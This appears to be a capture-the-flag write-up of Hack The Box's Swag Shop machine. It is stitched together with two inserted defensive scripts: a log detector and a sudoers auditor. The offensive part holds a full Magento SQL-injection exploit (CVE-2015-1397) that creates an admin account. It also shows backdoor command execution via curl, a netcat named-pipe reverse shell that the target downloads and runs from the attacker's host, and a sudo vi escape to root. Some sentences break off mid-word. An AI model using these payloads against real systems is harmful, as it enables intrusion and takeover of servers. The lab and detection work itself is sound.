This machine is Swag Shop from Hack The Box


root@kali:~# nmap -sV -p- -T4
Starting Nmap 7.70 ( ) at 2019-05-30 16:46 BST
Nmap scan report for
Host is up (0.034s latency).
Not shown: 65533 closed ports
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 23.28 seconds

The Box

So off to the web server

Screenshot 1

It is Magento. Some googling led to CVE-2015-1397, and I saved the exploit and modified it to point at the target, using different creds for the created user. But the exploit didn't work straight away: it seemed a URL used in the exploit was not present.


Screenshot 2

Some more googling led to an updated path o


Leading to an overall script of:

import requests
import base64
import sys

target = ""  # target host elided in the original post

if not target.startswith("http"):
    target = "http://" + target

if target.endswith("/"):
    target = target[:-1]

# The updated path: the original exploit used /admin/Cms_Wysiwyg/... without the /index.php prefix
target_url = target + "/index.php/admin/Cms_Wysiwyg/directive/index/"

# SQL appended to the report grid's popularity filter: creates an admin user and gives it a role
q = """
SET @SALT = 'rp';
SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','[email protected]','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');
"""

query = q.replace("\n", "").format(username="jirbjAdmin", password="jirbjPassword")
pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query)

# e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ decoded is {{block type=Adminhtml/report_search_grid output=getCsvFile}}
r = requests.post(target_url,
                  data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
                        "filter": base64.b64encode(pfilter),
                        "forwarded": 1})
if r.ok:
    print "WORKED"
    print "Check {0}/admin with creds".format(target)
else:
    print "DID NOT WORK"

So I ran it

root@kali:~# python
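The defender's side of the same technique, as an added example that is mine and not from the original post or the exploit's author. The first function runs over constructed Apache access-log lines and flags every request to the Cms_Wysiwyg directive controller, matched with or without the /index.php prefix the author needed, since an unauthenticated client has no business reaching that admin path. The second decodes the base64 filter parameter (only visible in a WAF or audit log, not in the access log) and treats any non-integer value in a popularity[...] field as an injection, because the real grid only ever sends numbers there. The sample log lines, the status-code heuristic and the function names are my assumptions.

```python
import base64
import re
from urllib.parse import unquote

# Apache "combined" log format; group names are my own choice.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

# The admin controller abused by CVE-2015-1397. The post found the exploit only
# worked with the /index.php prefix, so match the controller path wherever it
# sits in the URL and ignore any query string.
DIRECTIVE_RE = re.compile(r"/admin/Cms_Wysiwyg/directive/index/?(\?|$)", re.IGNORECASE)


def find_directive_requests(log_text):
    """Return one finding per request to the Cms_Wysiwyg directive controller.

    'likely_success' is a heuristic: a POST answered with 200 is the shape of a
    completed injection, whereas a 404 (old path) or 302 (patched install
    redirecting to the login page) is an attempt that did not land.
    """
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or not DIRECTIVE_RE.search(m.group("path")):
            continue
        findings.append({
            "ip": m.group("ip"),
            "ts": m.group("ts"),
            "method": m.group("method"),
            "status": int(m.group("status")),
            "ua": m.group("ua"),
            "likely_success": m.group("method") == "POST" and m.group("status") == "200",
        })
    return findings


def encode_filter(raw):
    """Base64-encode a raw filter string the way the client sends it."""
    return base64.b64encode(raw.encode()).decode()


def filter_is_injected(filter_b64):
    """Inspect the base64 'filter' POST parameter from a WAF or audit log.

    Legitimate report-grid filters only put integers in popularity[...]; the
    injection closes the SQL expression in popularity[field_expr] and appends
    statements, so any non-numeric value there is an injection attempt.
    """
    try:
        decoded = base64.b64decode(filter_b64, validate=True).decode("utf-8", "replace")
    except ValueError:
        return True  # the admin UI never sends a filter that is not valid base64
    for pair in decoded.split("&"):
        key, _, value = pair.partition("=")
        if key.startswith("popularity[") and not re.fullmatch(r"-?\d+", unquote(value)):
            return True
    return False


# Constructed sample log lines (not from the original post): a page view, the
# attempt at the old path (404), the attempt at the updated path (200), and a
# normal admin login afterwards.
SAMPLE_LOG = """\
10.10.14.5 - - [30/May/2019:16:50:01 +0100] "GET /index.php/ HTTP/1.1" 200 12345 "-" "Mozilla/5.0"
10.10.14.5 - - [30/May/2019:16:50:02 +0100] "POST /admin/Cms_Wysiwyg/directive/index/ HTTP/1.1" 404 321 "-" "python-requests/2.21.0"
10.10.14.5 - - [30/May/2019:16:50:03 +0100] "POST /index.php/admin/Cms_Wysiwyg/directive/index/ HTTP/1.1" 200 987 "-" "python-requests/2.21.0"
10.10.14.5 - - [30/May/2019:16:51:10 +0100] "GET /index.php/admin/ HTTP/1.1" 200 4321 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for f in find_directive_requests(SAMPLE_LOG):
        flag = "LIKELY SUCCESS" if f["likely_success"] else "attempt"
        print("{ts} {ip} {method} -> {status} [{flag}] {ua}".format(flag=flag, **f))
```

On the sample data the 404 at the old path and the 200 at the /index.php path both show up, which is exactly the two-request pattern the post describes; a single 200 POST to this controller from an IP that has never logged in to /admin is worth an alert on its own. The fix for the underlying bug is Magento's SUPEE-5344 patch (or a Magento release that includes it).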

And logged in with the created creds at

Screenshot 3

Screenshot 4

Which led to

Screenshot 5

I logged in again

Screenshot 6

So I found a module to upload

NOTE: Untick the following box; it stops the machine 503ing all the time.

Screenshot 7

I ended up using a backdoor I found on GitHub.

Screenshot 8

Screenshot 9

Now test it with curl

root@kali:~# curl -X POST -d "c=id"
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Reverse shell time

root@kali:~# nc -nvlp 4444

But none of my normal ones worked, so I made it download a script, first checking that wget was available:

root@kali:~# curl -X POST -d "c=which wget"

So I created a file with the following in, called

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4444 >/tmp/f

I exposed this with a web server and made the target download, chmod and execute it

root@kali:~# curl -X POST -d "c=wget -O /tmp/"

root@kali:~# curl -X POST -d "c=chmod +x /tmp/"

root@kali:~# curl -X POST -d "c=sh /tmp/"

Then back in the listener

connect to [] from (UNKNOWN) [] 59422
/bin/sh: 0: can't access tty; job control turned off

I upgraded my shell

$ python3 -c "import pty;pty.spawn('/bin/bash')"

A quick check of sudo

www-data@swagshop:/var/www/html$ sudo -l
Matching Defaults entries for www-data on swagshop:
    env_reset, mail_badpass,

User www-data may run the following commands on swagshop:
    (root) NOPASSWD: /usr/bin/vi /var/www/html/*

I can run vi as root as long as the file it is given is under /var/www/html, so I ran

www-data@swagshop:/var/www/html$ sudo vi /var/www/html/jirbj

Once in vi, I used it to run sh


I got my root shell

# id
uid=0(root) gid=0(root) groups=0(root)
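What an auditor would want to catch before this happens, as an added example of mine rather than anything from the post: a small checker for sudoers user-specification lines that flags the three things wrong with the rule sudo -l reported (NOPASSWD, an editor that can drop to a shell, and a trailing wildcard in the argument list, which in sudo's argument matching also matches '/' and therefore '..' traversal out of the intended directory). The tag list, the set of shell-escape binaries and the second sample rule are my assumptions; the first sample rule is the one from the box.

```python
import re
from dataclasses import dataclass, field
from typing import List

# Binaries that hand the caller a root shell or a root file write once sudo runs
# them; editors, pagers and interpreters are the usual offenders (vi can run a
# shell from its command line, which is the step used above).
SHELL_ESCAPE_BINARIES = {"vi", "vim", "view", "nano", "less", "more", "man",
                         "find", "awk", "perl", "python", "python3"}

# sudoers tags that may prefix a command (subset of the documented tag list).
SUDO_TAGS = {"NOPASSWD", "PASSWD", "NOEXEC", "EXEC", "SETENV", "NOSETENV",
             "LOG_INPUT", "NOLOG_INPUT", "LOG_OUTPUT", "NOLOG_OUTPUT",
             "MAIL", "NOMAIL", "FOLLOW", "NOFOLLOW"}

# user host = (runas) commands   -- runas is optional
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)


@dataclass
class Finding:
    rule: str
    problems: List[str] = field(default_factory=list)


def audit_sudoers_rule(line):
    """Audit one sudoers user-specification line and return a Finding.

    For each command in the rule:
      * NOPASSWD lets a compromised service account escalate with no password
      * an editor/pager/interpreter without NOEXEC can spawn a shell
      * '*' in the arguments matches '/', so a rule scoped to a directory also
        matches paths that traverse out of it with '..'
    """
    finding = Finding(rule=line.strip())
    m = RULE_RE.match(line.strip())
    if not m:
        finding.problems.append("unparsed line")
        return finding
    runas = m.group("runas") or "root"
    tags = set()
    for cmd in m.group("cmds").split(","):
        tokens = cmd.strip().split()
        # Leading "TAG:" words apply to this command and the ones after it.
        while tokens and tokens[0].endswith(":") and tokens[0].rstrip(":").upper() in SUDO_TAGS:
            tags.add(tokens.pop(0).rstrip(":").upper())
        if not tokens:
            continue
        binary = tokens[0].rsplit("/", 1)[-1]
        args = tokens[1:]
        if "NOPASSWD" in tags:
            finding.problems.append("NOPASSWD on %s" % tokens[0])
        if binary in SHELL_ESCAPE_BINARIES and "NOEXEC" not in tags:
            finding.problems.append("%s can spawn a shell as %s" % (binary, runas))
        if any("*" in a for a in args):
            finding.problems.append(
                "wildcard in arguments of %s matches '/' and so '..' traversal" % tokens[0])
    return finding


# Constructed sample rules: the first is the one sudo -l reported on the box,
# the second is a tightly scoped rule for comparison.
SAMPLE_RULES = [
    "www-data ALL=(root) NOPASSWD: /usr/bin/vi /var/www/html/*",
    "deploy ALL=(root) /usr/bin/systemctl restart apache2",
]

if __name__ == "__main__":
    for rule in SAMPLE_RULES:
        f = audit_sudoers_rule(rule)
        print(f.rule)
        for p in f.problems or ["ok"]:
            print("  -", p)
```

If a web-service account genuinely needs to edit files as root, sudoedit is the form to use: it copies the file, runs the editor as the invoking user and copies the result back, so there is no root editor to escape from. Where a real editor must run as root, the NOEXEC tag blocks its shell escape, and the argument should name specific files rather than a directory wildcard.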

Time to grab the flags

# cd /home
# ls -la
drwxr-xr-x  3 root  root  4096 May  2 14:48 .
drwxr-xr-x 23 root  root  4096 May  2 14:55 ..
drwxr-xr-x  3 haris haris 4096 May  8 09:21 haris

# cd haris
# ls -la
drwxr-xr-x 3 haris haris 4096 May  8 09:21 .
drwxr-xr-x 3 root  root  4096 May  2 14:48 ..
-rw------- 1 haris haris   54 May  2 14:56 .Xauthority
lrwxrwxrwx 1 root  root     9 May  8 09:20 .bash_history -> /dev/null
-rw-r--r-- 1 haris haris  220 May  2 14:48 .bash_logout
-rw-r--r-- 1 haris haris 3771 May  2 14:48 .bashrc
drwx------ 2 haris haris 4096 May  2 14:49 .cache
-rw------- 1 root  root     1 May  8 09:20 .mysql_history
-rw-r--r-- 1 haris haris  655 May  2 14:48 .profile
-rw-r--r-- 1 haris haris    0 May  2 14:49 .sudo_as_admin_successful
-rw-r--r-- 1 haris haris   33 May  8 09:01 user.txt

# cat user.txt

# cd /root
# ls -la
drwx------  3 root root 4096 May  8 09:21 .
drwxr-xr-x 23 root root 4096 May  2 14:55 ..
-rw-r--r--  1 root root 3106 Oct 22  2015 .bashrc
drwxr-xr-x  2 root root 4096 May  2 14:50 .nano
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-------  1 root root  270 May  8 09:01 root.txt

# cat root.txt

   ___ ___
 /| |/|\| |\
/_| ´ |.` |_\           We are open! (Almost)
  |   |.  |
  |   |.  |         Join the beta HTB Swag Store!

                   PS: Use root flag as password!

